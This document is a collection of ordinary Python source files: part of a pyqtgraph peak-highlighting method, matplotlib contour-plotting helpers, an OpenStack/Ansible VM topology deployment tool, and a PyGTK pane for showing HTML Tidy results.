pixel_width = self.getViewBox().viewPixelSize()[0]
left = np.searchsorted(
self._mzs, mouse_point.x() - 4.0 * pixel_width, side="left"
)
right = np.searchsorted(
self._mzs, mouse_point.x() + 4.0 * pixel_width, side="right"
)
if left == right: # none found -> remove text
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.highlighted_peak_label.setText("")
return
# get point in range with minimum squared distance
dx = np.square(np.subtract(self._mzs[left:right], mouse_point.x()))
dy = np.square(np.subtract(
self._ints[left:right], mouse_point.y()))
idx_max_int_in_range = np.argmin(np.add(dx, dy))
x = self._mzs[left + idx_max_int_in_range]
y = self._ints[left + idx_max_int_in_range]
"""se_comment: changed == to is"""
if self.highlighted_peak_label is None:
self.highlighted_peak_label = pg.TextItem(
text="{0:.3f}".format(x),
color=(100, 100, 100),
anchor=(0.5, 1.5)
)
self.addItem(
self.highlighted_peak_label, ignoreBounds=True
) # ignore bounds to prevent rescaling of axis
# if the text item touches the border
self.highlighted_peak_label.setText("{0:.3f}".format(x))
self.highlighted_peak_label.setPos(x, y)
else:
# mouse moved out of visible area: remove highlighting item
"""se_comment: changed != to is not"""
if self.highlighted_peak_label is not None:
self.highlighted_peak_label.setText("")
|
py | 7dfac9683385d3f1a282acb069c1b85bab75b3bf | import pylab as pl
import pdb
def plot_scattered_data(x, y, z, nx=100, ny=100, plot_dots=True):
'''
plots 2d data.
x, y : coordinate
z : data value
based on scipy cookbook (http://www.scipy.org/Cookbook/Matplotlib/Gridding_irregularly_spaced_data)
'''
import numpy as np
from matplotlib.mlab import griddata
import matplotlib.pyplot as plt
import numpy.ma as ma
from numpy.random import uniform
# make up some randomly distributed data
# define grid.
xi = np.linspace(x.min(), x.max(), nx)
yi = np.linspace(y.min(), y.max(), ny)
# grid the data.
zi = griddata(x,y,z,xi,yi)
#
# contour the gridded data, plotting dots at the randomly spaced data points.
plt.contour(xi,yi,zi,15,linewidths=0.5,colors='k')
plt.contourf(xi,yi,zi,15,cmap=plt.cm.jet)
plt.colorbar() # draw colorbar
# plot data points.
if plot_dots: plt.scatter(x,y,marker='o',c='b',s=5)
#plt.xlim(x.min(), x.max())
#plt.ylim(y.min(), y.max())
plt.show()
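# Sketch of calling plot_scattered_data on made-up irregular samples (illustrative
# only; it relies on the deprecated matplotlib.mlab.griddata import used above, so
# it assumes an older matplotlib release is installed).
def _demo_plot_scattered_data(n=200):
    import numpy as np
    x = np.random.uniform(-2, 2, n)
    y = np.random.uniform(-2, 2, n)
    z = x * np.exp(-x ** 2 - y ** 2)
    plot_scattered_data(x, y, z, nx=100, ny=100, plot_dots=True)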
def contourf(x, y, z, zmin=None, zmax=None, fig=None, nlvls=20, **kwargs):
'''
    Make a contour plot with a useful colormap scaled to zmin, zmax
Based on http://bytes.com/topic/python/answers/891999-matplotlib-colorbar-scale-problem
Ex:
ax = PU.contourf(t, x, z/maxval, 0., 1.)
setp(ax, 'xlabel', 'TIME')
setp(ax, 'ylabel', 'MD')
setp(ax, 'title', '%s %s (relative)' % (frftfile.split('.')[0], varnm))
'''
if fig is None: fig = pl.figure()
if zmin is None: zmin = z.ravel().min()
if zmax is None: zmax = z.ravel().max()
fig.clf()
norm = pl.Normalize(vmin=zmin, vmax=zmax)
#
# plot contours
    ax1 = fig.add_axes([0.11, 0.09, 0.73, 0.81], **kwargs)  # forward optional Axes keyword arguments
pl.plt.contourf(x, y, z, nlvls, norm=norm)
pl.plt.contourf(x, y, z, nlvls, norm=norm) # plotting twice to avoid contourlines. bug??
pl.axis((x[0], x[-1], y[0], y[-1])) # not sure why this is necessary
#
# plot colorbar
ax2 = fig.add_axes([0.86, 0.09, 0.06, 0.81])
pl.mpl.colorbar.ColorbarBase(ax2, norm=norm, orientation='vertical')
#
return ax1
def contours(z, zmin=None, zmax=None, fig=None, nlvls=20):
x = pl.arange(z.shape[0])
y = pl.arange(z.shape[1])
return contourf(x, y, z.T, zmin=zmin, zmax=zmax, fig=fig, nlvls=nlvls)
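# Sketch of typical usage of contours() on a synthetic field (illustrative only;
# assumes an interactive matplotlib backend, and the data below is a placeholder).
def _demo_contours():
    z = pl.rand(30, 40)  # fake 2-D field
    ax = contours(z, zmin=0.0, zmax=1.0, nlvls=10)
    pl.setp(ax, 'xlabel', 'x-index')
    pl.setp(ax, 'ylabel', 'y-index')
    pl.show()
    return ax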
|
py | 7dfac9dad8669f9475d9948765d14a9e6231891a | # Copyright (c) 2014 Alcatel-Lucent Enterprise
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time, os, sys
try:
import yaml
except:
print "Module yaml not found !"
print "sudo pip install pyyaml"
sys.exit(1)
try:
import novaclient.client, cinderclient.client
except:
print "Module nova and/or cinder not found !"
print "sudo pip install python-novaclient"
print "sudo pip install python-cinderclient"
sys.exit(1)
try:
from neutronclient.v2_0 import client as neutronClient
except:
print "sudo pip install python-neutronclient"
sys.exit(1)
try:
import ansible.playbook
from ansible import callbacks
from ansible import utils
except:
print "Module ansible not found !"
print "sudo pip install ansible"
sys.exit(1)
# Used for ansible inventory
import ConfigParser
import subprocess
import shlex
# Used for playbooks stdout
from threading import Thread
class CommandExecutor:
def __init__(self, verbose):
self.verbose = verbose
def command(self, cmd, async=False, environment=None):
to_execute = cmd
env = os.environ.copy()
if environment:
env.update(environment)
if self.verbose:
print env
print ">>"+to_execute
if async:
return subprocess.Popen(shlex.split(to_execute), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True)
else:
return subprocess.call(shlex.split(to_execute), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True)
def isRunning(self, p):
return p.poll() is None
class Volume:
def __init__(self, name, size):
self.name = name
self.size = size
class InstanceEvents:
def onVMCreated(self, instance):
pass
def onVMActive(self, instance):
pass
def onVMReady(self, instance):
pass
def onVMDeleted(self, instance):
pass
class Instance:
def __init__(self, name, flavor, ansible_sections, playbook_file, volumes, floating_ips, vips, additional_security_groups, dependencies, nova, cinder, neutron, image, networks, ssh_key_name, ssh_user, ssh_key, cmdExe, static, groups):
self.name = name
self.flavor = flavor
self.ansible_sections = ansible_sections
self.playbook_file = playbook_file
self.volumes = volumes
self.floating_ips = floating_ips
self.vips = vips
self.additional_security_groups = additional_security_groups
self.dependencies = dependencies
self.nova = nova
self.cinder = cinder
self.neutron = neutron
self.image = image
self.networks = networks
self.ssh_key_name = ssh_key_name
self.ssh_key = ssh_key
self.ssh_user = ssh_user
self.cmdExe = cmdExe
self.vm = None
self.deploy_dependencies = []
self.callbacks = []
self.status = "Unavailable"
self.static = static
self.groups = groups
self.checkReady = False
def updateVM(self, vm):
previous_vm = self.vm
self.vm = vm
if vm:
if not previous_vm:
self.status = "Created"
for c in self.callbacks:
c.onVMCreated(self)
if self.status == "Created":
if self.vm.status == "ACTIVE":
self.status = "Active"
for c in self.callbacks:
c.onVMActive(self)
if self.vm.status == "ACTIVE" and not self.status == "Ready" and self.checkReady:
if self.cmdExe.command("ssh -o LogLevel=quiet -o ConnectTimeout=2 -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null -i " + self.ssh_key.replace(" ", "\ ") + " " + self.ssh_user + "@" + self.getIPAddress() + " \"ls && ! pgrep apt-get\"") == 0:
self.status = "Ready"
for c in self.callbacks:
c.onVMReady(self)
else:
if previous_vm:
self.status = "Deleted"
for c in self.callbacks:
c.onVMDeleted(self)
def getPortId(self, ip):
ports = self.neutron.list_ports()
for k in ports["ports"]:
if (k["fixed_ips"][0]["ip_address"] == ip):
return k["id"]
def getFloatingIpId(self, ip):
floatingips = self.neutron.list_floatingips()
for k in floatingips["floatingips"]:
if k["floating_ip_address"] == ip:
return k["id"]
def getNetworkId(self, name):
networks = self.neutron.list_networks()
for k in networks["networks"]:
if k["name"] == name:
return k["id"]
def getIPAddress(self, net=0):
if self.vm and self.vm.status == "ACTIVE" and self.vm.networks.has_key(self.networks[net]):
return self.vm.networks[self.networks[net]][0]
return None
def getSecurityGroupId(self, name):
list = self.nova.security_groups.list()
i = 0
for k in list:
if k.name == name:
return k.id
i = i + 1
return None
def delete(self):
if self.static:
raise RuntimeError("Not allowed to delete static VM")
if not self.vm:
return
self.checkReady = False
# delete ports for vips
if len(self.vips) > 0 and self.floating_ips > 0:
for vip in self.vips:
portId = self.getPortId(vip)
if portId != None:
self.neutron.delete_port(portId)
# Get attached volumes
l = []
for v in self.vm._info['os-extended-volumes:volumes_attached']:
l.append(v["id"])
self.nova.servers.delete(self.vm)
# Destroy attached volumes
for v in l:
while len(self.cinder.volumes.get(v)._info["attachments"]):
time.sleep(1)
self.cinder.volumes.delete(v)
def create(self):
if self.static:
raise RuntimeError("Not allowed to create static VM")
self.checkReady = True
block_device_mapping = {}
if len(self.volumes):
letter = ord('b')
for vol in self.volumes:
v = self.cinder.volumes.create(display_name=vol.name, size=vol.size)
block_device_mapping["/dev/vd%c"%chr(letter)] = "%s:::0"%v.id
letter= letter + 1
# Wait for creation
created = False
while not created:
v = self.cinder.volumes.get(v.id)
#print v.status
if v.status == "available":
created = True
time.sleep(1)
flavor = self.nova.flavors.find(name=self.flavor)
nics = []
for network in self.networks:
net = self.nova.networks.find(label=network)
nics.append({'net-id': net.id})
img = self.nova.images.find(name=self.image)
self.nova.servers.create(self.name, img, flavor, nics=nics, key_name = self.ssh_key_name, block_device_mapping=block_device_mapping)
def whenReady(self):
if self.static:
raise RuntimeError("Not allowed to update static VM")
self.associateFloatingIP()
self.setSecurityGroups()
self.cmdExe.command("ssh-keygen -R " + self.getIPAddress())
name = self.name.split("-")
vmType = name[1]
#vip management
i = 0
if len(self.vips) > 0:
# create port
for vip in self.vips:
if self.getPortId(vip) == None:
self.createPortForVip(i, vip)
i = i + 1
# ip associating
i = 0
for floatingip in self.floating_ips:
floatingipid = self.getFloatingIpId(floatingip)
vipPortId = self.getPortId(self.vips[i])
self.associateFloatingToPortVip(floatingipid, vipPortId)
i = i + 1
# update port
i = 0
for vip in self.vips:
body = {
"port": {
"allowed_address_pairs" : [{
"ip_address" : vip
}]
}
}
self.neutron.update_port(self.getPortId(self.getIPAddress(net=i)), body=body)
i = i + 1
def associateFloatingIP(self):
if len(self.vips) == 0 and len(self.floating_ips):
if not self.vm:
raise RuntimeError("Error: could not associate floating IP on not existing VM %s"%self.name)
cpt = 0
for floating_ip in self.floating_ips:
self.vm.add_floating_ip(floating_ip, self.getIPAddress(cpt))
cpt = cpt + 1
def associateFloatingToPortVip(self, floatingipId, portId):
body = {
"floatingip": {
"port_id" : portId
}
}
self.neutron.update_floatingip(floatingipId, body=body)
def setSecurityGroups(self):
if len(self.additional_security_groups):
if not self.vm:
raise RuntimeError("Error: could not set security groups on not existing VM %s"%self.name)
for sec in self.additional_security_groups:
self.vm.add_security_group(sec)
def createPortForVip(self,id, ip):
securityGroupsIds = []
for sec in self.additional_security_groups:
group_id = self.getSecurityGroupId(sec)
if group_id is None:
raise RuntimeError("Error: could not find the security group id for %s"%sec)
securityGroupsIds.append(str(group_id))
body = {
"port":
{
"admin_state_up": True,
"name": "vip" + str(id),
"network_id": self.getNetworkId(self.networks[id]),
"fixed_ips" :
[{
"ip_address" : ip
}],
"security_groups" : securityGroupsIds
}
}
self.neutron.create_port(body=body)
class PlaybookEvents:
def onPlaybookUpdated(self, playbook):
pass
def onPlaybookCompleted(self, playbook):
pass
def onPlaybookError(self, playbook):
pass
class Playbook:
def __init__(self, name, path, dependencies, env, ssh_user, ssh_key, inventory_file, cmdExe, verbose, static):
self.name = name
self.path = path
self.dependencies = dependencies
self.env = env
self.instances = []
self.ssh_key = ssh_key
self.ssh_user = ssh_user
self.inventory_file = inventory_file
self.cmdExe = cmdExe
self.verbose = ""
if verbose:
self.verbose = "-vvvv"
self.depPriority = 0
self.process = None
self.console_output=""
self.callbacks = []
self.status = "Not played"
if static:
self.status = "Not playable"
self.current_task = 0
def prepare(self):
if self.status == "Not playable":
raise RuntimeError("Not allowed to play %s"%self.name)
self.current_task = 0
self.tasks = []
playbook_cb = callbacks.PlaybookCallbacks(verbose=utils.VERBOSITY)
stats = callbacks.AggregateStats()
runner_cb = callbacks.PlaybookRunnerCallbacks(stats, verbose=utils.VERBOSITY)
pb = ansible.playbook.PlayBook(playbook=self.path, inventory=ansible.inventory.Inventory(self.inventory_file), remote_user=self.ssh_user, callbacks=playbook_cb, runner_callbacks=runner_cb, stats=stats, sudo="1", extra_vars={"env": self.env})
for (play_ds, play_basedir) in zip(pb.playbook, pb.play_basedirs):
play = ansible.playbook.Play(pb, play_ds, play_basedir,vault_password=pb.vault_password)
label = play.name
for task in play.tasks():
if (set(task.tags).intersection(pb.only_tags) and not set(task.tags).intersection(pb.skip_tags)):
if getattr(task, 'name', None) is not None:
self.tasks.append(task.name)
self.status = "Not played"
self.priority = self.depPriority + len(self.tasks)
def play(self):
if self.status == "Not playable":
raise RuntimeError("Not allowed to play %s"%self.name)
self.status = "Running"
# Start sub process
self.process = self.cmdExe.command("ansible-playbook %s --sudo --user=%s --private-key=%s --extra-vars=env=%s --inventory-file=%s %s"%(self.verbose, self.ssh_user, self.ssh_key.replace(" ", "\ "), self.env, self.inventory_file.replace(" ", "\ "), self.path.replace(" ", "\ ")), True, environment={"ANSIBLE_HOST_KEY_CHECKING": "False", "PYTHONUNBUFFERED": "True"})
t = Thread(target=self.processOutput)
t.start()
def terminate(self):
self.process.terminate()
def processOutput(self):
for line in iter(self.process.stdout.readline,''):
# Keep output in case of error
self.console_output = self.console_output + line
if line.startswith("TASK: "):
self.current_task = self.current_task + 1
for c in self.callbacks:
c.onPlaybookUpdated(self)
while self.cmdExe.isRunning(self.process):
time.sleep(1)
if self.process.returncode == 0:
self.status = "Completed"
for c in self.callbacks:
c.onPlaybookCompleted(self)
else:
self.status = "Error"
for c in self.callbacks:
c.onPlaybookError(self)
class TopologyEvents:
# Provisioning events
def onPlaybookAdded(self, playbook):
pass
def onPlaybookRemoved(self, playbook):
pass
def onInstanceAdded(self, instance):
pass
def onInstanceRemoved(self, instance):
pass
# Topology related events
def onStarted(self):
pass
# Instance related events
def onRedeployStarted(self):
pass
def onInstanceDeleted(self, instance):
pass
def onInstanceCreated(self, instance):
pass
def onInstanceActive(self, instance):
pass
def onInstanceReady(self, instance):
pass
def onAllInstancesReady(self):
pass
# Inventory related event
def onInventoryGenerated(self):
pass
# Playbook related events
def onAllPlaybooksStarted(self):
pass
def onPlaybookUpdated(self, playbook):
pass
def onPlaybookCompleted(self, playbook):
pass
def onAllPlaybooksCompleted(self):
pass
def onPlaybookError(self, playbook):
pass
class Topology(PlaybookEvents, InstanceEvents):
def __init__(self, topofile, verbose):
self.instances = []
self.playbooks = []
# Open topology file
with open(topofile, "r") as f:
topology = yaml.load(f)[0]
self.topo_directory = os.path.join(os.path.abspath(os.path.dirname(topofile)))
# Parse topology
# Generic values
self.env = topology["globals"]["env"]
self.ssh_key = os.path.join(self.topo_directory, topology["globals"]["ssh_key"])
self.ssh_user = topology["globals"]["ssh_user"]
self.ansible_inventory_template = os.path.join(self.topo_directory, topology["globals"]["ansible_inventory_template"])
self.inventory_file = os.path.join(os.path.abspath(os.path.dirname(self.ansible_inventory_template)), self.env)
self.cmdExe = CommandExecutor(verbose)
# Open stack variables
os_user = topology["globals"]["os_user"]
os_passwd = topology["globals"]["os_passwd"]
os_tenant = topology["globals"]["os_tenant"]
os_auth_url = topology["globals"]["os_auth_url"]
os_image = topology["globals"]["os_image"]
os_network = topology["globals"]["os_network"]
os_ssh_key = topology["globals"]["os_ssh_key"]
self.nova = novaclient.client.Client(2, os_user, os_passwd, os_tenant, os_auth_url)
cinder = cinderclient.client.Client('1', os_user, os_passwd, os_tenant, os_auth_url)
neutron = neutronClient.Client(username=os_user, password=os_passwd, tenant_name=os_tenant, auth_url=os_auth_url)
# Nodes to initiate
for i in topology["nodes"]:
node = i["node"]
name = node["name"]
playbook = None
if "playbook" in node:
playbook = node["playbook"]
flavor = None
if "flavor" in node:
flavor = node["flavor"]
ansible_config_keys = []
if "ansible_config_keys" in node:
ansible_config_keys = [x.strip() for x in node["ansible_config_keys"].split(",")]
volumes = []
if "volumes" in node:
for v in node["volumes"]:
volumes.append(Volume(v["name"], int(v["size"])))
floating_ips = []
if "floating_ips" in node:
floating_ips = [x.strip() for x in node["floating_ips"].split(",")]
vips = []
if "vips" in node:
vips = [x.strip() for x in node["vips"].split(",")]
additional_security_groups = []
if "security" in node:
additional_security_groups = [x.strip() for x in node["security"].split(",")]
dependencies = []
if "depends" in node:
dependencies = [x.strip() for x in node["depends"].split(",")]
networks = [os_network]
if "additional_network" in node:
networks.extend([x.strip() for x in node["additional_network"].split(",")])
static = False
if not playbook or "static" in node:
static = True
groups = []
if "groups" in node:
groups = [x.strip() for x in node["groups"].split(",")]
instance = Instance(name, flavor, ansible_config_keys, playbook, volumes, floating_ips, vips, additional_security_groups, dependencies, self.nova, cinder, neutron, os_image, networks, os_ssh_key, self.ssh_user, self.ssh_key, self.cmdExe, static, groups)
instance.callbacks.append(self)
self.instances.append(instance)
f.close()
# Compute playbooks
self.ansible_playbooks_directory = os.path.join(self.topo_directory, topology["globals"]["ansible_playbooks_directory"])
for instance in self.instances:
if instance.playbook_file:
pb = self.findPlaybook(instance.playbook_file)
if pb:
pb.instances.append(instance)
for dep in instance.dependencies:
if not dep in pb.dependencies:
pb.dependencies.append(dep)
else:
path = os.path.join(self.ansible_playbooks_directory, instance.playbook_file)
if not path.endswith(".yml"):
path = path + ".yml"
if not os.path.isfile(path):
raise NameError("Playbook %s does not exist! (no file %s)"%(instance.playbook_file, path))
pb = Playbook(instance.playbook_file, path, instance.dependencies, self.env, self.ssh_user, self.ssh_key, self.inventory_file, self.cmdExe, verbose, instance.static)
pb.instances.append(instance)
pb.callbacks.append(self)
self.playbooks.append(pb)
# Check dependencies and compute a priority for each
for pb in self.playbooks:
for dep in pb.dependencies:
p = self.findPlaybook(dep)
if p:
p.depPriority = p.depPriority + 100
else:
raise NameError("Dependency %s not defined in %s"%(dep, topofile))
self.callbacks = []
# To search playbooks/instances with a name
self.instances_by_name = {}
self.playbooks_by_name = {}
for i in self.instances:
if i.name in self.instances_by_name or i.name in self.playbooks_by_name:
raise NameError("Two instances with name %s"%i.name)
self.instances_by_name[i.name] = [i]
self.playbooks_by_name[i.name] = [self.findPlaybook(i.playbook_file)]
for p in self.playbooks:
if p.name in self.instances_by_name or p.name in self.playbooks_by_name:
raise NameError("Playbook name %s with other playbook or instance"%p.name)
self.instances_by_name[p.name] = p.instances
self.playbooks_by_name[p.name] = [p]
for i in self.instances:
for g in i.groups:
if g in self.instances_by_name or g in self.playbooks_by_name:
raise NameError("Group name %s conflicts with playbook or instance"%g)
for i in self.instances:
for g in i.groups:
if not g in self.instances_by_name:
self.instances_by_name[g] = [i]
else:
self.instances_by_name[g].append(i)
p = self.findPlaybook(i.playbook_file)
if not g in self.playbooks_by_name:
self.playbooks_by_name[g] = [p]
elif not p in self.playbooks_by_name[g]:
self.playbooks_by_name[g].append(p)
self.playbooks_to_play = []
self.instances_to_redeploy = []
self.is_running = False
self.refreshInstances()
self.refreshTime = 20
t = Thread(target=self.refreshInstancesThread)
t.setDaemon(True)
t.start()
def refreshInstancesThread(self):
while True:
time.sleep(self.refreshTime)
try:
self.refreshInstances()
except:
print "ERROR REFRESHING INSTANCES STATE"
print "Unexpected error:", sys.exc_info()[0]
def refreshInstances(self):
remainingTopoVMs = list(self.instances)
vms = self.nova.servers.list()
for vm in vms:
instance = self.findInstance(vm.name)
if instance:
instance.updateVM(vm)
if not instance in remainingTopoVMs:
raise RuntimeError("Duplicated VM with name %s"%instance.name)
remainingTopoVMs.remove(instance)
# Handle deleted VMs
for i in remainingTopoVMs:
i.updateVM(None)
def onVMCreated(self, instance):
for c in self.callbacks:
c.onInstanceCreated(instance)
def onVMActive(self, instance):
for c in self.callbacks:
c.onInstanceActive(instance)
def onVMReady(self, instance):
for c in self.callbacks:
c.onInstanceReady(instance)
if self.is_running and instance in self.instances_to_redeploy:
instance.whenReady()
self.instances_ready.append(instance)
if len(self.instances_ready) == len(self.instances_to_redeploy):
#Reset refresh timer
self.refreshTime = 20
for c in self.callbacks:
c.onAllInstancesReady()
self.startPlaybooks()
def onVMDeleted(self, instance):
for c in self.callbacks:
c.onInstanceDeleted(instance)
if self.is_running and instance in self.instances_to_redeploy:
            # sleep 5 seconds before recreating the VM to work around a neutron-dhcp-agent issue (DHCP not able to assign the IP if the VM is created directly after being deleted...)
time.sleep(5)
instance.create()
def startRedeployInstances(self):
for c in self.callbacks:
c.onRedeployStarted()
self.instances_ready = []
# Refresh time about status of VM
self.refreshTime = 1
for instance in self.instances_to_redeploy:
# Do not create/delete static instances
if not instance.static:
if instance.vm:
instance.delete()
else:
instance.create()
def findInstance(self, name):
for i in self.instances:
if i.name == name:
return i
return None
def generateAnsibleInventory(self):
# Load template file
conf = ConfigParser.RawConfigParser(allow_no_value=True)
conf.read(os.path.join(self.ansible_inventory_template))
# Add IPs in ansible configuration file
for instance in self.instances:
for section in instance.ansible_sections:
ip = instance.getIPAddress()
if ip == None:
raise RuntimeError("Could not generate inventory because \"%s\" not found (no IP, is it started ?)"%instance.name)
host = ip + " name=" + instance.name
if len(instance.floating_ips):
host = host + " public=" + instance.floating_ips[0]
conf.set(section, host, None)
f = open(self.inventory_file, "w")
conf.write(f)
f.close()
for c in self.callbacks:
c.onInventoryGenerated()
def findPlaybook(self, name):
for p in self.playbooks:
if p.name == name:
return p
return None
def playNextPlaybooks(self):
candidates = []
cpt_running = 0
for pb in self.playbooks_to_play:
if pb.status == "Not played":
# Check dependencies
all_dep_ok = True
for d in pb.dependencies:
pbDep = self.findPlaybook(d)
if pbDep in self.playbooks_to_play and pbDep.status != "Completed":
all_dep_ok = False
if all_dep_ok:
candidates.append(pb)
elif pb.status == "Running":
cpt_running = cpt_running + 1
# Takes candidate with higher priority
def getPriority(pb):
return pb.priority
ordered_candidates = sorted(candidates, key=getPriority, reverse=True)
if len(ordered_candidates):
# Limit number of parallel playbooks
nb = min(len(ordered_candidates), 10-cpt_running)
for pb in ordered_candidates[:nb]:
pb.play()
def onPlaybookUpdated(self, playbook):
for c in self.callbacks:
c.onPlaybookUpdated(playbook)
def onPlaybookCompleted(self, playbook):
for c in self.callbacks:
c.onPlaybookCompleted(playbook)
self.completed_playbooks.append(playbook)
if len(self.completed_playbooks) == len(self.playbooks_to_play):
self.is_running = False
for c in self.callbacks:
c.onAllPlaybooksCompleted()
else:
self.playNextPlaybooks()
def onPlaybookError(self, playbook):
self.is_running = False
for pb in self.playbooks_to_play:
if pb.status == "Running":
pb.terminate()
for c in self.callbacks:
c.onPlaybookError(playbook)
def startPlaybooks(self):
self.generateAnsibleInventory()
# Prepare playbooks to play
for pb in self.playbooks_to_play:
pb.prepare()
for c in self.callbacks:
c.onAllPlaybooksStarted()
self.end = False
self.counter = 0
self.completed_playbooks = []
# Launch playbooks
self.playNextPlaybooks()
def addToRedeploy(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.instances_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for i in self.instances_by_name[name]:
if not i in self.instances_to_redeploy and not i.static:
self.instances_to_redeploy.append(i)
for c in self.callbacks:
c.onInstanceAdded(i)
self.addToReconfigure(i.name)
def removeToRedeploy(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.instances_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for i in self.instances_by_name[name]:
if i in self.instances_to_redeploy:
self.instances_to_redeploy.remove(i)
for c in self.callbacks:
c.onInstanceRemoved(i)
def addToReconfigure(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.playbooks_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for p in self.playbooks_by_name[name]:
if not p in self.playbooks_to_play and p.status != "Not playable":
self.playbooks_to_play.append(p)
for c in self.callbacks:
c.onPlaybookAdded(p)
def removeToReconfigure(self, name):
if self.is_running:
raise RuntimeError("Could modify because running")
if not name in self.playbooks_by_name:
raise NameError("No instance, playbook or group named %s in topology"%name)
for p in self.playbooks_by_name[name]:
if p in self.playbooks_to_play:
self.playbooks_to_play.remove(p)
for c in self.callbacks:
c.onPlaybookRemoved(p)
self.removeToRedeploy(p.name)
def run(self):
if self.is_running:
raise RuntimeError("Could not run because already running")
if len(self.instances_to_redeploy) or len(self.playbooks_to_play):
self.is_running = True
for c in self.callbacks:
c.onStarted()
if len(self.instances_to_redeploy):
self.startRedeployInstances()
else:
self.startPlaybooks()
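# Illustrative sketch of a minimal topology file that the Topology() parser above
# would accept. The field names are taken from the parsing code in __init__; every
# value here is a made-up placeholder, not a real deployment.
_EXAMPLE_TOPOLOGY_YAML = """
- globals:
    env: dev
    ssh_key: keys/dev.pem
    ssh_user: cloud
    ansible_inventory_template: ansible/inventory.template
    ansible_playbooks_directory: ansible/playbooks
    os_user: demo
    os_passwd: secret
    os_tenant: demo
    os_auth_url: http://controller:5000/v2.0
    os_image: ubuntu-14.04
    os_network: private
    os_ssh_key: dev-keypair
  nodes:
    - node:
        name: dev-db-01
        playbook: database
        flavor: m1.medium
        ansible_config_keys: db
        volumes:
          - name: dev-db-01-data
            size: 20
    - node:
        name: dev-web-01
        playbook: webserver
        flavor: m1.small
        ansible_config_keys: web
        floating_ips: 192.0.2.10
        security: web-sg
        depends: database
"""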
|
py | 7dfacb0ea1c451ffd0cae948615749d53d5d2b96 | # Copyright (C) 2007 Ami Tavory ([email protected])
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307, USA.
"""
Output pane for displaying Tidy's output.
"""
import unittest
import pygtk
pygtk.require('2.0')
import gtk
import pango
import sys, string
import log_utils
import tidy_utils
def _make_column(title, num, markup, allow_sort):
renderer = gtk.CellRendererText()
column = gtk.TreeViewColumn(title, renderer)
if markup:
column.add_attribute(renderer, 'markup', num)
else:
column.add_attribute(renderer, 'text', num)
if allow_sort:
column.set_sort_column_id(num)
return column
def _type_to_color(type_):
assert tidy_utils.is_valid_type(type_)
if type_ == 'Error':
return 'red'
elif type_ == 'Warning':
return 'orange'
elif type_ == 'Config':
return 'purple'
else:
return 'black'
def _color_span(color, s):
return '<span foreground = "%s">%s</span>' %(color, s)
def _cond_visible(n):
if n != None:
return n
return ''
def _str_to_int(s):
if s == '':
return None
return int(s)
def _make_str_int_cmp(num):
def str_int_cmp(model, it0, it1):
lhs = _str_to_int( model.get_value(it0, num) )
rhs = _str_to_int( model.get_value(it1, num) )
if lhs == None and rhs == None:
return 0
if lhs == None:
return -1
if rhs == None:
return 1
if lhs < rhs:
return -1
if lhs == rhs:
return 0
return 1
return str_int_cmp
class _output_box(gtk.TreeView):
def __init__(self, on_activated):
self._list_store = gtk.ListStore(str, str, str, str)
super(_output_box, self).__init__(self._list_store)
self.append_column(_make_column('Line', 0, False, True))
self._list_store.set_sort_func(0, _make_str_int_cmp(0))
self.append_column(_make_column('Column', 1, False, False))
self._list_store.set_sort_func(1, _make_str_int_cmp(1))
self.append_column(_make_column('Type', 2, True, True))
self.append_column(_make_column('Message', 3, False, True))
self.set_headers_clickable(True)
self._on_activated = on_activated
self.connect("row-activated", self._on_row_activated)
def append(self, line, col, type_, what):
log_utils.debug('adding %s %s %s %s to output box' %(line, col, type_, what))
color = _type_to_color(type_)
log_utils.debug('adding %s %s to output box' %(_color_span(color, type_), what))
self._list_store.append([_cond_visible(line), _cond_visible(col), _color_span(color, type_), what])
log_utils.debug('added to output box')
def clear(self):
log_utils.debug('clearing output box')
self._list_store.clear()
log_utils.debug('cleared output box')
def _on_row_activated(self, view, row, column):
assert self == view
model = view.get_model()
iter = model.get_iter(row)
line = _str_to_int( model.get_value(iter, 0) )
col = _str_to_int( model.get_value(iter, 1) )
type_ = model.get_value(iter, 2)
what = model.get_value(iter, 3)
self._on_activated(line, col, type_, what)
class output_pane(gtk.ScrolledWindow):
"""
Output pane for displaying Tidy's output.
"""
def __init__(self, on_activated):
"""
Keyword arguments:
on_activated -- Callback for when a row is activated.
"""
super(output_pane, self).__init__()
self.set_policy(gtk.POLICY_NEVER, gtk.POLICY_AUTOMATIC);
self.set_shadow_type(gtk.SHADOW_IN)
self._box = _output_box(on_activated)
self.add_with_viewport(self._box)
self._box.show()
self.target_uri = None
def append(self, line, col, type_, what):
"""
Append another row.
"""
self._box.append(line, col, type_, what)
def clear(self):
"""
Clear all rows.
"""
self._box.clear()
self.target_uri = None
class test(unittest.TestCase):
def _print_activated(self, line, col, type_, what):
print line, col, type_, what
def test_output_pane_0(self):
o = output_pane(self._print_activated)
o.connect("destroy", gtk.main_quit)
main_wnd = gtk.Window(gtk.WINDOW_TOPLEVEL)
main_wnd.set_title('Output');
main_wnd.add(o)
o.target_uri = 'foo'
o.append(None, None, 'Info', 'Some info')
o.append(1, 2, 'Warning', 'Bad stuff!')
o.append(10, 2, 'Error', 'unknown tag <boo>')
o.append(1, 222, 'Warning', 'Also bad stuff!')
